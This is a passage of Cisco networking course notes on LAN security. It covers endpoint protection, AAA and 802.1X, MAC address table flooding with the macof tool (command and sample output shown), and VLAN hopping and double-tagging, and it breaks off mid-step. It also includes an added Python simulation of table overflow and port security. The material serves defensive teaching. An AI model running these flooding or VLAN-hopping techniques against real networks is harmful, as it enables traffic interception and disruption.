
Bridging Switching Routing Notes

The document covers LAN security concepts, emphasizing the importance of network security for IT professionals. It includes topics such as endpoint security, access control, layer 2 security threats, and various types of LAN attacks. The module aims to educate users on how to secure networks and mitigate potential vulnerabilities and attacks.

BRIDGING, SWITCHING, ROUTING AND WIRELESS ESSENTIALS

Table of Contents

10 LAN SECURITY CONCEPTS ..... 5
10.0 INTRODUCTION ..... 5
10.0.1 Why should I take this module? ..... 5
10.0.2 What will I learn in this module? ..... 5
10.1 ENDPOINT SECURITY ..... 5
10.1.1 Network Attacks Today ..... 5
10.1.2 Network Security Devices ..... 6
10.1.3 Endpoint Protection ..... 6
10.1.4 Cisco Email Security Appliance (Cisco ESA) ..... 7
10.1.5 Cisco Web Security Appliance (Cisco WSA) ..... 8
10.1.6 Check Your Understanding – Endpoint Security ..... 8
10.2 ACCESS CONTROL ..... 9
10.2.1 Authentication with a Local Password ..... 9
10.2.2 AAA Components ..... 10
10.2.3 Authentication ..... 11
10.2.4 Authorization ..... 12
10.2.5 Accounting ..... 12
10.2.6 802.1X ..... 12
10.2.7 Check Your Understanding – Access Control ..... 13
10.3 LAYER 2 SECURITY THREATS ..... 14
10.3.1 Layer 2 Vulnerabilities ..... 14
10.3.2 Switch Attack Categories ..... 15
10.3.3 Switch Attack Mitigation Techniques ..... 16
10.3.4 Check Your Understanding – Layer 2 Security Threats ..... 16
10.4 MAC ADDRESS TABLE ATTACK ..... 18
10.4.1 Switch Operation Review ..... 18
10.4.2 MAC Address Table Flooding ..... 18
10.4.3 MAC Address Table Attack Mitigation ..... 19
10.4.4 Check Your Understanding – MAC Address Table Attacks ..... 20
10.5 LAN ATTACKS ..... 20
10.5.1 Video – VLAN and DHCP Attacks ..... 20
10.5.2 VLAN Hopping Attacks ..... 20
10.5.3 VLAN Double-Tagging Attack ..... 21
10.5.4 DHCP Messages ..... 23
10.5.5 DHCP Attacks ..... 23
10.5.6 Video – ARP Attacks, STP Attacks, and CDP Reconnaissance ..... 27
10.5.7 ARP Attacks ..... 27
10.5.8 Address Spoofing Attack ..... 29
10.5.9 STP Attack ..... 29
10.5.10 CDP Reconnaissance ..... 31
10.5.11 Check Your Understanding – LAN Attacks ..... 32
10.6 MODULE PRACTICE AND QUIZ ..... 34
10.6.1 What did I learn in this module? ..... 34
10.6.2 Module Quiz – LAN Security Concepts ..... 35
11 SWITCH SECURITY CONFIGURATION ..... 40
11.0.1 Why should I take this module? ..... 40
11.0.2 What will I learn in this module? ..... 40
11.1 IMPLEMENT PORT SECURITY ..... 40
11.1.1 Secure Unused Ports ..... 40
11.1.2 Mitigate MAC Address Table Attacks ..... 41
11.1.3 Enable Port Security ..... 42
11.1.4 Limit and Learn MAC Addresses ..... 43
11.1.5 Port Security Aging ..... 44
11.1.6 Port Security Violation Modes ..... 46
11.1.7 Ports in error-disabled State ..... 47
11.1.8 Verify Port Security ..... 48
11.1.9 Syntax Checker – Implement Port Security ..... 50
11.1.10 Packet Tracer – Implement Port Security ..... 51
11.2 MITIGATE VLAN ATTACKS ..... 52
11.2.1 Mitigate VLAN Attacks Review ..... 52
11.2.2 Steps to Mitigate VLAN Hopping Attacks ..... 52
11.2.3 Syntax Checker – Mitigate VLAN Hopping Attacks ..... 53
11.3 MITIGATE DHCP ATTACKS ..... 54
11.3.1 DHCP Attack Review ..... 54
11.3.2 DHCP Snooping ..... 54
11.3.3 Steps to Implement DHCP Snooping ..... 55
11.3.4 DHCP Snooping Configuration Example ..... 55
11.3.5 Syntax Checker – Mitigate DHCP Attacks ..... 57
11.4 MITIGATE ARP ATTACKS ..... 58
11.4.1 Dynamic ARP Inspection ..... 58
11.4.2 DAI Implementation Guidelines ..... 58
11.4.3 DAI Configuration Example ..... 59
11.4.4 Syntax Checker – Mitigate ARP Attacks ..... 60
11.5 MITIGATE STP ATTACKS ..... 60
11.5.1 PortFast and BPDU Guard ..... 60
11.5.2 Configure PortFast ..... 61
11.5.3 Configure BPDU Guard ..... 62
11.5.4 Syntax Checker – Mitigate STP Attacks ..... 63
11.6 MODULE PRACTICE AND QUIZ ..... 64
11.6.1 Packet Tracer – Switch Security Configuration ..... 64
11.6.2 Lab – Switch Security Configuration ..... 64
11.6.3 What did I learn in this module? ..... 65
11.6.4 Module Quiz – Switch Security Configuration ..... 66
12 WLAN CONCEPTS ..... 73
12.0.1 Why should I take this module? ..... 73
12.0.2 What will I learn in this module? ..... 73
12.1 INTRODUCTION TO WIRELESS ..... 74
12.1.1 Benefits of Wireless ..... 74
12.1.2 Types of Wireless Networks ..... 74
12.1.3 Wireless Technologies ..... 75
12.1.4 802.11 Standards ..... 77
12.1.5 Radio Frequencies ..... 78
12.1.6 Wireless Standards Organizations ..... 79
12.1.7 Check Your Understanding – Introduction to Wireless ..... 80
12.2 WLAN CONCEPTS ..... 81
12.2.1 Video – WLAN Concepts ..... 81
12.2.2 Wireless NIC ..... 81
12.2.3 Wireless Home Router ..... 82
12.2.4 Wireless Access Point ..... 82
12.2.5 AP Categories ..... 82
12.2.6 Wireless Antennas ..... 84
12.2.7 Check Your Understanding – WLAN Concepts ..... 84
12.3 WLAN OPERATION ..... 85
12.3.1 Video – WLAN Operation ..... 85
12.3.2 802.11 Wireless Topology Modes ..... 86
12.3.3 BSS and ESS ..... 86
12.3.4 802.11 Frame Structure ..... 88
12.3.5 CSMA/CA ..... 88
12.3.6 Wireless Client and AP Association ..... 89
12.3.7 Passive and Active Discover Mode ..... 90
12.3.8 Check Your Understanding – WLAN Operation ..... 91
12.4 CAPWAP OPERATION ..... 92
12.4.1 Video – CAPWAP ..... 92
12.4.2 Introduction to CAPWAP ..... 92
12.4.3 Split MAC Architecture ..... 93
12.4.4 Datagram Transport Layer Security (DTLS) Encryption ..... 93
12.4.5 FlexConnect APs ..... 94
12.4.6 Check Your Understanding – CAPWAP Operation ..... 95
12.5 CHANNEL MANAGEMENT ..... 97
12.5.1 Frequency Channel Saturation ..... 97
12.5.2 Channel Selection ..... 99
12.5.3 Plan a WLAN Deployment ..... 100
12.5.4 Check Your Understanding – Channel Management ..... 101
12.6 WLAN THREATS ..... 102
12.6.1 Video – WLAN Threats ..... 102
12.6.2 Wireless Security Overview ..... 103
12.6.3 DoS Attacks ..... 103
12.6.4 Rogue Access Point ..... 103
12.6.5 Man-in-the-Middle Attack ..... 104
12.6.6 Check Your Understanding – WLAN Threats ..... 105
12.7 SECURE WLANS ..... 106
12.7.1 Video – Secure WLANs ..... 106
12.7.2 SSID Cloaking and MAC Address Filtering ..... 106
12.7.3 802.11 Original Authentication Methods ..... 107
12.7.4 Shared Key Authentication Methods ..... 108
12.7.5 Authenticating a Home User ..... 108
12.7.6 Encryption Methods ..... 109
12.7.7 Authentication in the Enterprise ..... 110
12.7.8 WPA3 ..... 110
12.7.9 Check Your Understanding – Secure WLANs ..... 111
12.8 MODULE PRACTICE AND QUIZ ..... 113
12.8.1 What did I learn in this module? ..... 113
12.8.2 Module Quiz – WLAN Concepts ..... 114
13 WLAN CONFIGURATION ..... 119
13.0.1 Why should I take this module? ..... 119
13.0.2 What will I learn to do in this module? ..... 119
13.1 REMOTE SITE WLAN CONFIGURATION ..... 119
13.1.1 Video – Configure a Wireless Network ..... 119
13.1.2 The Wireless Router ..... 119
13.1.3 Log in to the Wireless Router ..... 120
13.1.4 Basic Network Setup ..... 121
13.1.5 Basic Wireless Setup ..... 124
13.1.6 Configure a Wireless Mesh Network ..... 127
13.1.7 NAT for IPv4 ..... 128
13.1.8 Quality of Service ..... 129
13.1.9 Port Forwarding ..... 129
13.1.10 Packet Tracer – Configure a Wireless Network ..... 130
13.1.11 Lab – Configure a Wireless Network ..... 130
13.2 CONFIGURE A BASIC WLAN ON THE WLC ..... 131
13.2.1 Video – Configure a Basic WLAN on the WLC ..... 131
13.2.2 WLC Topology ..... 131
13.2.3 Log in to the WLC ..... 132
13.2.4 View AP Information ..... 133
13.2.5 Advanced Settings ..... 134
13.2.6 Configure WLAN ..... 134
13.2.7 Packet Tracer – Configure a Basic WLAN on the WLC ..... 138
13.3 CONFIGURE A WPA2 ENTERPRISE WLAN ON THE WLC ..... 138
13.3.1 Video – Define an SNMP and RADIUS Server on the WLC ..... 138
13.3.2 SNMP and RADIUS ..... 139
13.3.3 Configure SNMP Server Information ..... 139
13.3.4 Configure RADIUS Server Information ..... 140
13.3.5 Video – Configure a VLAN for a New WLAN ..... 141
13.3.6 Topology with VLAN 5 Addressing ..... 142
13.3.7 Configure a New Interface ..... 142
13.3.8 Video – Configure a DHCP Scope ..... 145
13.3.9 Configure a DHCP Scope ..... 145
13.3.10 Video – Configure a WPA2 Enterprise WLAN ..... 147
13.3.11 Configure a WPA2 Enterprise WLAN ..... 147
13.3.12 Packet Tracer – Configure a WPA2 Enterprise WLAN on the WLC ..... 150
13.4 TROUBLESHOOT WLAN ISSUES ..... 151
13.4.1 Troubleshooting Approaches ..... 151
13.4.2 Wireless Client Not Connecting ..... 152
13.4.3 Troubleshooting When the Network Is Slow ..... 153
13.4.4 Updating Firmware ..... 154
13.4.5 Packet Tracer – Troubleshoot WLAN Issues ..... 155
13.5 MODULE PRACTICE AND SUMMARY ..... 155
13.5.1 Packet Tracer – WLAN Configuration ..... 155
13.5.2 What did I learn in this module? ..... 155
13.5.3 Module Quiz – WLAN Configuration ..... 156
GLOSSARY ..... 161

10 LAN Security Concepts
10.0 Introduction

10.0.1 Why should I take this module?

Welcome to LAN Security Concepts.

If your career path is in IT, you won’t just be building or maintaining networks. You will be responsible for the
security of your network. For today’s network architects and administrators, security is not an afterthought. It is
a top priority for them! In fact, many people in IT now work exclusively in the area of network security.

Do you understand what makes a LAN secure? Do you know what threat actors can do to break network
security? Do you know what you can do to stop them? This module is your introduction to the world of network
security, so don’t wait, click Next!

10.0.2 What will I learn in this module?

Module Title: LAN Security Concepts

Module Objective: Explain how vulnerabilities compromise LAN security.

Topic Title – Topic Objective

Endpoint Security – Explain how to use endpoint security to mitigate attacks.
Access Control – Explain how AAA and 802.1X are used to authenticate LAN endpoints and devices.
Layer 2 Security Threats – Identify Layer 2 vulnerabilities.
MAC Address Table Attack – Explain how a MAC address table attack compromises LAN security.
LAN Attacks – Explain how LAN attacks compromise LAN security.

10.1 Endpoint Security

10.1.1 Network Attacks Today

The news media commonly covers attacks on enterprise networks. Simply search the internet for “latest
network attacks” to find up-to-date information on current attacks. Most likely, these attacks will involve one or
more of the following:

• Distributed Denial of Service (DDoS) – This is a coordinated attack from many devices, called zombies,
with the intention of degrading or halting public access to an organization’s website and resources.
• Data Breach – This is an attack in which an organization’s data servers or hosts are compromised to steal
confidential information.
• Malware – This is an attack in which an organization’s hosts are infected with malicious software that
causes a variety of problems. For example, ransomware such as WannaCry, shown in the figure, encrypts
the data on a host and locks access to it until a ransom is paid.

10.1.2 Network Security Devices

Various network security devices are required to protect the network perimeter from outside access. These
devices could include a virtual private network (VPN) enabled router, a Next-Generation Firewall (NGFW),
and a Network Access Control (NAC) device.

A VPN-enabled router provides a secure connection to remote users across a public network and into the
enterprise network. VPN services can be integrated into the firewall.

An NGFW provides stateful packet inspection, application visibility and control, a next-generation intrusion
prevention system (NGIPS), advanced malware protection (AMP), and URL filtering.

A NAC device includes authentication, authorization, and accounting (AAA) services. In larger enterprises,
these services might be incorporated into an appliance that can manage access policies across a wide variety
of users and device types. The Cisco Identity Services Engine (ISE) is an example of a NAC device.

10.1.3 Endpoint Protection

LAN devices such as switches, wireless LAN controllers (WLCs), and other access point (AP) devices
interconnect endpoints. Most of these devices are susceptible to the LAN-related attacks that are covered in
this module.

But many attacks can also originate from inside the network. If an internal host is infiltrated, it can become a
starting point for a threat actor to gain access to critical system devices, such as servers and sensitive data.
Endpoints are hosts which commonly consist of laptops, desktops, servers, and IP phones, as well as
employee-owned devices that are typically referred to as Bring Your Own Devices (BYODs).

Endpoints are particularly susceptible to malware-related attacks that originate through email or web browsing.
These endpoints have typically used traditional host-based security features, such as antivirus/antimalware,
host-based firewalls, and host-based intrusion prevention systems (HIPSs). However, today endpoints are
best protected by a combination of NAC, host-based AMP software, an Email Security Appliance (ESA),
and a Web Security Appliance (WSA). Advanced Malware Protection (AMP) products include endpoint
solutions such as Cisco AMP for Endpoints.

The figure is a simple topology representing all the network security devices and endpoint solutions discussed
in this module.

The figure is a network topology showing network security devices and endpoint solutions. At the upper left is
the Internet cloud. Attached to the Internet cloud is a remote user with a VPN client. Connected to the cloud on
the internal network is a VPN-enabled router, which is connected to an NGFW. The NGFW is connected to a
multilayer switch which has two connections to another multilayer switch. Connected to the first switch is a
NAC AAA/ISE device. Connected to the second switch is an ESA/WSA device. The two multilayer switches are
both connected to a secured LAN switch and a WLC. Several wired and wireless endpoints secured with AMP
are also shown, including a desktop, laptop, IP phone, and smartphone.

10.1.4 Cisco Email Security Appliance (Cisco ESA)

Content security appliances include fine-grained control over email and web browsing for an organization’s
users.

According to Cisco’s Talos Intelligence Group, in June 2019, 85% of all email sent was spam. Phishing
attacks are a particularly virulent form of spam. Recall that a phishing attack entices the user to click a link or
open an attachment. Spear phishing targets high-profile employees or executives who may have elevated
login credentials. This is particularly crucial in today’s environment where, according to the SANS Institute,
95% of all attacks on enterprise networks are the result of a successful spear phishing attack.

The Cisco ESA is a device that is designed to monitor Simple Mail Transfer Protocol (SMTP). The Cisco
ESA is constantly updated by real-time feeds from Cisco Talos, which detects and correlates threats and
solutions by using a worldwide database monitoring system. This threat intelligence data is pulled by the Cisco
ESA every three to five minutes. These are some of the functions of the Cisco ESA:

• Block known threats.
• Remediate against stealth malware that evaded initial detection.
• Discard emails with bad links (as shown in the figure).
• Block access to newly infected sites.
• Encrypt content in outgoing email to prevent data loss.

In the figure, the Cisco ESA discards the email with bad links.

1. The threat actor sends a phishing attack to an important host on the network.
2. The firewall forwards all email to the ESA.
3. The ESA analyzes the email, logs it, and if it is malware, discards it.

10.1.5 Cisco Web Security Appliance (Cisco WSA)

The Cisco Web Security Appliance (WSA) is a mitigation technology for web-based threats. It helps
organizations address the challenges of securing and controlling web traffic. The Cisco WSA combines
advanced malware protection, application visibility and control, acceptable use policy controls, and reporting.

The Cisco WSA provides complete control over how users access the internet. Certain features and applications,
such as chat, messaging, video and audio, can be allowed, restricted with time and bandwidth limits, or
blocked, according to the organization’s requirements. The WSA can perform blacklisting of URLs, URL
filtering, malware scanning, URL categorization, web application filtering, and encryption and decryption of
web traffic.

In the figure, an internal corporate employee uses a smartphone to attempt to connect to a known blacklisted
site.

1. A user attempts to connect to a website.
2. The firewall forwards the website request to the WSA.
3. The WSA evaluates the URL and determines it is a known blacklisted site. The WSA discards the
packet and sends an access denied message to the user.

10.1.6 Check your understanding – Endpoint Security

10.2 Access Control

10.2.1 Authentication with a Local Password

In the previous topic, you learned that a NAC device provides AAA services. In this topic, you will learn more
about AAA and the ways to control access.

Many types of authentication can be performed on networking devices, and each method offers varying levels
of security. The simplest method of remote access authentication is to configure a login and password
combination on console, vty lines, and aux ports, as shown in the vty lines in the following example. This
method is the easiest to implement, but it is also the weakest and least secure. This method provides no
accountability and the password is sent in plaintext. Anyone with the password can gain entry to the device.

R1(config)# line vty 0 4
R1(config-line)# password ci5c0
R1(config-line)# login

SSH is a more secure form of remote access:

• It requires a username and a password, both of which are encrypted during transmission.
• The username and password can be authenticated by the local database method.
• It provides more accountability because the username is recorded when a user logs in.

The following example illustrates SSH and local database methods of remote access.

R1(config)# ip domain-name [Link]
R1(config)# crypto key generate rsa general-keys modulus 2048
R1(config)# username Admin secret Str0ng3rPa55w0rd
R1(config)# ssh version 2
R1(config)# line vty 0 4
R1(config-line)# transport input ssh
R1(config-line)# login local

The local database method has some limitations:

• User accounts must be configured locally on each device. In a large enterprise environment with multiple
routers and switches to manage, it can take time to implement and change local databases on each
device.
• The local database configuration provides no fallback authentication method. For example, what if the
administrator forgets the username and password for that device? With no backup method available for
authentication, password recovery becomes the only option.

A better solution is to have all devices refer to the same database of usernames and passwords from a central
server.

10.2.2 AAA Components

AAA stands for Authentication, Authorization, and Accounting. The AAA concept is similar to using a credit
card, as shown in the figure. The credit card identifies who can use it, how much that user can spend, and
keeps an account of what items or services the user purchased.

AAA provides the primary framework to set up access control on a network device. AAA is a way to control
who is permitted to access a network (authenticate), what they can do while they are there (authorize), and to
audit what actions they performed while accessing the network (accounting).

10.2.3 Authentication

Local and server-based are two common methods of implementing AAA authentication.

Local AAA Authentication

Local AAA stores usernames and passwords locally in a network device such as the Cisco router. Users
authenticate against the local database, as shown in figure. Local AAA is ideal for small networks.

1. The client establishes a connection with the router.
2. The AAA router prompts the user for the username and password.
3. The router authenticates the username and password using the local database and the user is
provided access to the network based on information in the local database.

Server-Based AAA Authentication

With the server-based method, the router accesses a central AAA server, as shown in figure. The AAA server
contains the usernames and passwords for all users. The router uses either the Remote Authentication Dial-In
User Service (RADIUS) or Terminal Access Controller Access Control System (TACACS+) protocols to
communicate with the AAA server. When there are multiple routers and switches, server-based AAA is more
appropriate.

The figure shows a remote client connecting to a AAA router: the client is prompted for a username and
password, the router authenticates the credentials using a AAA server, and the user is provided access to the
network.

1. The client establishes a connection with the router.
2. The AAA router prompts the user for a username and password.
3. The router authenticates the username and password using a AAA server.
4. The user is provided access to the network based on information in the remote AAA server.

10.2.4 Authorization

AAA authorization is automatic and does not require users to perform additional steps after authentication.
Authorization governs what users can and cannot do on the network after they are authenticated.

Authorization uses a set of attributes that describes the user’s access to the network. These attributes are
used by the AAA server to determine privileges and restrictions for that user, as shown in the figure.

1. When a user has been authenticated, a session is established between the router and the AAA server.
2. The router requests authorization from the AAA server for the client’s requested service.
3. The AAA server returns a PASS/FAIL response for authorization.

10.2.5 Accounting

AAA accounting collects and reports usage data. This data can be used for such purposes as auditing or
billing. The collected data might include the start and stop connection times, executed commands, number of
packets, and number of bytes.

A primary use of accounting is to combine it with AAA authentication. The AAA server keeps a detailed log of
exactly what the authenticated user does on the device, as shown in the figure. This includes all EXEC and
configuration commands issued by the user. The log contains numerous data fields, including the username,
the date and time, and the actual command that was entered by the user. This information is useful when
troubleshooting devices. It also provides evidence for when individuals perform malicious acts.

1. When a user has been authenticated, the AAA accounting process generates a start message to
begin the accounting process.
2. When the user finishes, a stop message is recorded and the accounting process ends.

10.2.6 802.1X

The IEEE 802.1X standard is a port-based access control and authentication protocol. This protocol restricts
unauthorized workstations from connecting to a LAN through publicly accessible switch ports. The
authentication server authenticates each workstation that is connected to a switch port before making
available any services offered by the switch or the LAN.

With 802.1X port-based authentication, the devices in the network have specific roles, as shown in the figure.

• Client (Supplicant) – This is a device running 802.1X-compliant client software, which is available for
wired or wireless devices.
• Switch (Authenticator) – The switch acts as an intermediary between the client and the authentication
server. It requests identifying information from the client, verifies that information with the authentication
server, and relays a response to the client. Another device that could act as authenticator is a wireless
access point.
• Authentication server – The server validates the identity of the client and notifies the switch or wireless
access point that the client is or is not authorized to access the LAN and switch services.

10.2.7 Check Your Understanding – Access Control

10.3 Layer 2 Security Threats

10.3.1 Layer 2 Vulnerabilities

The previous two topics discussed securing endpoints. In this topic, you will continue to learn about ways to
secure the LAN by focusing on the frames found in the data link layer (Layer 2) and the switch.

Recall that the OSI reference model is divided into seven layers which work independently of each other. The
figure shows the function of each layer and the core elements that can be exploited.

Network administrators routinely implement security solutions to protect the elements in Layer 3 up
through Layer 7. They use VPNs, firewalls, and IPS devices to protect these elements. However, if Layer 2
is compromised, then all the layers above it are also affected. For example, if a threat actor with access to the
internal network captured Layer 2 frames, then all the security implemented on the layers above would be
useless. The threat actor could cause a lot of damage on the Layer 2 LAN networking infrastructure.

10.3.2 Switch Attack Categories

Security is only as strong as the weakest link in the system, and Layer 2 is considered to be that weak link.
This is because LANs were traditionally under the administrative control of a single organization. We
inherently trusted all persons and devices connected to our LAN. Today, with BYOD and more sophisticated
attacks, our LANs have become more vulnerable to penetration. Therefore, in addition to protecting Layer 3 to
Layer 7, network security professionals must also mitigate attacks to the Layer 2 LAN infrastructure.

The first step in mitigating attacks on the Layer 2 infrastructure is to understand the underlying operation of
Layer 2 and the threats posed by the Layer 2 infrastructure.

Attacks against the Layer 2 LAN infrastructure are described in the table and are discussed in more detail later
in this module.

Layer 2 Attacks

Category – Examples

MAC Table Attacks – Includes MAC address flooding attacks.
VLAN Attacks – Includes VLAN hopping and VLAN double-tagging attacks. It also includes attacks between
devices on a common VLAN.
DHCP Attacks – Includes DHCP starvation and DHCP spoofing attacks.
ARP Attacks – Includes ARP spoofing and ARP poisoning attacks.
Address Spoofing Attacks – Includes MAC address and IP address spoofing attacks.
STP Attacks – Includes Spanning Tree Protocol manipulation attacks.

10.3.3 Switch Attack Mitigation Techniques

The table provides an overview of Cisco solutions to help mitigate Layer 2 attacks.

Layer 2 Attack Mitigation

Solution – Description

Port Security – Prevents many types of attacks including MAC address flooding attacks and DHCP starvation
attacks.
DHCP Snooping – Prevents DHCP starvation and DHCP spoofing attacks.
Dynamic ARP Inspection (DAI) – Prevents ARP spoofing and ARP poisoning attacks.
IP Source Guard (IPSG) – Prevents MAC and IP address spoofing attacks.

These Layer 2 solutions will not be effective if the management protocols are not secured. For example, the
management protocols Syslog, Simple Network Management Protocol (SNMP), Trivial File Transfer Protocol
(TFTP), Telnet, File Transfer Protocol (FTP), and most other common protocols are insecure; therefore, the
following strategies are recommended:

• Always use secure variants of these protocols such as SSH, Secure Copy Protocol (SCP), Secure FTP
(SFTP), and Secure Socket Layer/Transport Layer Security (SSL/TLS).
• Consider using an out-of-band management network to manage devices.
• Use a dedicated management VLAN where nothing but management traffic resides.
• Use ACLs to filter unwanted access.

10.3.4 Check Your Understanding – Layer 2 Security Threats

10.4 MAC Address Table Attack

10.4.1 Switch Operation Review

In this topic, the focus is still on switches, specifically their MAC address tables and how these tables are
vulnerable to attacks.

Recall that to make forwarding decisions, a Layer 2 LAN switch builds a table based on the source MAC
addresses in received frames. Shown in the figure, this is called a MAC address table. MAC address tables
are stored in memory and are used to more efficiently forward frames.

S1# show mac address-table dynamic
          Mac Address Table
-------------------------------------------
Vlan    Mac Address       Type        Ports
----    -----------       --------    -----
   1    0001.9717.22e0    DYNAMIC     Fa0/4
   1    000a.f38e.74b3    DYNAMIC     Fa0/1
   1    [Link]            DYNAMIC     Fa0/3
   1    00d0.ba07.8499    DYNAMIC     Fa0/2
S1#

10.4.2 MAC Address Table Flooding

All MAC tables have a fixed size and consequently, a switch can run out of resources in which to store MAC
addresses. MAC address flooding attacks take advantage of this limitation by bombarding the switch with fake
source MAC addresses until the switch MAC address table is full.

When this occurs, the switch treats the frame as an unknown unicast and begins to flood all incoming traffic
out all ports on the same VLAN without referencing the MAC table. This condition now allows a threat actor to
capture all of the frames sent from one host to another on the local LAN or local VLAN.

Note: Traffic is flooded only within the local LAN or VLAN. The threat actor can only capture traffic within the
local LAN or VLAN to which the threat actor is connected.

The figure shows how a threat actor can easily use the network attack tool macof to overflow a MAC address
table.

1. The threat actor is connected to VLAN 10 and uses macof to rapidly generate many random source
and destination MAC and IP addresses.
2. Over a short period of time, the switch’s MAC table fills up.
3. When the MAC table is full, the switch begins to flood all frames that it receives. As long as macof
continues to run, the MAC table remains full and the switch continues to flood all incoming frames out
every port associated with VLAN 10.
4. The threat actor then uses packet sniffing software to capture frames from any and all devices
connected to VLAN 10.

If the threat actor stops macof from running or is discovered and stopped, the switch eventually ages out the
older MAC address entries from the table and begins to act like a switch again.

10.4.3 MAC Address Table Attack Mitigation

What makes tools such as macof so dangerous is that an attacker can create a MAC table overflow attack
very quickly. For instance, a Catalyst 6500 switch can store 132,000 MAC addresses in its MAC address
table. A tool such as macof can flood a switch with up to 8,000 bogus frames per second, creating a MAC
address table overflow in a matter of a few seconds. The example shows sample output of
the macof command on a Linux host.

# macof -i eth1
[Link] [Link] [Link].26413 > [Link].49492: S 1094191437:1094191437(0) win 512
[Link] [Link] [Link].61376 > [Link].47523: S 446486755:446486755(0) win 512
[Link] [Link] [Link].20086 > [Link].6728: S 105051945:105051945(0) win 512
[Link] [Link] [Link].45282 > [Link].24898: S 1838062028:1838062028(0) win 512
[Link] [Link] [Link].11587 > [Link].7723: S 1792413296:1792413296(0) win 512
[Link] [Link] [Link].19784 > [Link].57433: S 1018924173:1018924173(0) win 512
[Link] [Link] [Link].283 > [Link].11466: S 727776406:727776406(0) win 512
[Link] [Link] [Link].32650 > [Link].11324: S 605528173:605528173(0) win 512
[Link] [Link] [Link].36346 > [Link].55700: S 2128143986:2128143986(0) win 512

Another reason why these attack tools are dangerous is because they not only affect the local switch, they can
also affect other connected Layer 2 switches. When the MAC address table of a switch is full, it starts flooding
out all ports including those connected to other Layer 2 switches.

To mitigate MAC address table overflow attacks, network administrators must implement port security. Port
security will only allow a specified number of source MAC addresses to be learned on the port. Port security is
further discussed in another module.
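As an added illustration (not part of the course text), the following Python simulation models the switch behaviour described in 10.4.1 to 10.4.3: a fixed-size MAC address table, unknown-unicast flooding once the table is full, entry aging, and the per-port address limit that port security enforces. The port names, table size and MAC addresses are assumptions made up for the example.

```python
"""Constructed simulation of a fixed-size switch MAC address table.

Models the behaviour described in 10.4.1 to 10.4.3: the switch learns the
source MAC of each frame on the ingress port, forwards a known unicast out one
port, floods an unknown unicast out every other port in the VLAN, ages out idle
entries, and once the table is full can no longer learn new addresses. The
port-security limit named in 10.4.3 is modelled as a per-port cap on learned
addresses. Port names, table size and MAC addresses are made up.
"""
from dataclasses import dataclass, field
from typing import Optional

AGING_SECONDS = 300  # Cisco IOS default MAC aging time


@dataclass
class Switch:
    ports: list                         # all ports in the VLAN
    capacity: int                       # maximum dynamic entries in the table
    max_per_port: Optional[int] = None  # port-security maximum; None = disabled
    table: dict = field(default_factory=dict)       # mac -> (port, last_seen)
    violations: list = field(default_factory=list)  # (port, mac) refused

    def learned_on(self, port: str) -> int:
        """Number of addresses currently learned on a port."""
        return sum(1 for p, _ in self.table.values() if p == port)

    def age_out(self, now: int) -> None:
        """Remove entries that were not refreshed within the aging time."""
        stale = [m for m, (_, seen) in self.table.items()
                 if now - seen > AGING_SECONDS]
        for mac in stale:
            del self.table[mac]

    def receive(self, in_port: str, src: str, dst: str, now: int) -> list:
        """Process one frame and return the ports it is forwarded out of."""
        self.age_out(now)
        if src not in self.table:
            # Port security: a new address above the per-port limit is not
            # learned and the frame is dropped (shutdown violation mode).
            if (self.max_per_port is not None
                    and self.learned_on(in_port) >= self.max_per_port):
                self.violations.append((in_port, src))
                return []
            if len(self.table) >= self.capacity:
                # Table full: the address is not learned, so frames addressed
                # to this host will be flooded until some entry ages out.
                return self._forward(in_port, dst)
        self.table[src] = (in_port, now)  # learn or refresh the entry
        return self._forward(in_port, dst)

    def _forward(self, in_port: str, dst: str) -> list:
        if dst in self.table:
            out_port = self.table[dst][0]
            return [] if out_port == in_port else [out_port]
        return [p for p in self.ports if p != in_port]  # flood unknown unicast


PC1, PC2 = "000a.f38e.74b3", "00d0.ba07.8499"  # legitimate hosts (constructed)


def run_scenario(port_security: bool) -> dict:
    """Fill the table from Fa0/3, then see where a PC1 -> PC2 frame goes."""
    sw = Switch(ports=["Fa0/1", "Fa0/2", "Fa0/3"], capacity=8,
                max_per_port=2 if port_security else None)
    sw.receive("Fa0/1", PC1, PC2, now=0)  # PC1 learned on Fa0/1
    sw.receive("Fa0/2", PC2, PC1, now=0)  # PC2 learned on Fa0/2
    # A host on Fa0/3 sends one frame per second with rotating bogus source
    # MACs (constructed), keeping the table full for longer than the aging
    # time. The rate does not change the outcome, only how fast it happens.
    for t in range(1, 400):
        sw.receive("Fa0/3", f"dead.beef.{t % 16:04x}", f"c0ff.ee00.{t:04x}", now=t)
    # PC1 and PC2 have been idle longer than the aging time and start talking.
    sw.receive("Fa0/2", PC2, PC1, now=400)
    return {"pc1_to_pc2": sw.receive("Fa0/1", PC1, PC2, now=401),
            "table_size": len(sw.table),
            "violations": len(sw.violations)}


if __name__ == "__main__":
    print("no port security:", run_scenario(False))  # PC1 -> PC2 also reaches Fa0/3
    print("port security   :", run_scenario(True))   # PC1 -> PC2 reaches Fa0/2 only
```

Without the per-port limit the bogus addresses occupy the whole table, so after PC2's entry ages out it cannot be relearned and PC1's traffic to it is flooded out Fa0/3 as well; with the limit the third bogus address on Fa0/3 is a violation and the table never fills.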

10.4.4 Check Your Understanding – MAC Address Table Attacks

10.5 LAN Attacks

10.5.1 Video – VLAN and DHCP Attacks

10.5.2 VLAN Hopping Attacks

A VLAN hopping attack enables traffic from one VLAN to be seen by another VLAN without the aid of a router.
In a basic VLAN hopping attack, the threat actor configures a host to act like a switch to take advantage of the
automatic trunking port feature enabled by default on most switch ports.

The threat actor configures the host to spoof 802.1Q signaling and Cisco-proprietary Dynamic Trunking
Protocol (DTP) signaling to trunk with the connecting switch. If successful, the switch establishes a trunk link
with the host, as shown in the figure. Now the threat actor can access all the VLANs on the switch. The threat
actor can send and receive traffic on any VLAN, effectively hopping between VLANs.

10.5.3 VLAN Double-Tagging Attack

A threat actor in specific situations could embed a hidden 802.1Q tag inside the frame that already has an
802.1Q tag. This tag allows the frame to go to a VLAN that the original 802.1Q tag did not specify.

Step 1

The threat actor sends a double-tagged 802.1Q frame to the switch. The outer header has the VLAN tag of
the threat actor, which is the same as the native VLAN of the trunk port. For the purposes of this example,
assume that this is VLAN 10. The inner tag is the victim VLAN, in this example, VLAN 20.

Step 2

The frame arrives on the first switch, which looks at the first 4-byte 802.1Q tag. The switch sees that the frame
is destined for VLAN 10, which is the native VLAN. The switch forwards the packet out all VLAN 10 ports after
stripping the VLAN 10 tag. The frame is not retagged because it is part of the native VLAN. At this point, the
VLAN 20 tag is still intact and has not been inspected by the first switch.

Step 3

The frame arrives at the second switch which has no knowledge that it was supposed to be for VLAN 10.
Native VLAN traffic is not tagged by the sending switch as specified in the 802.1Q specification. The second
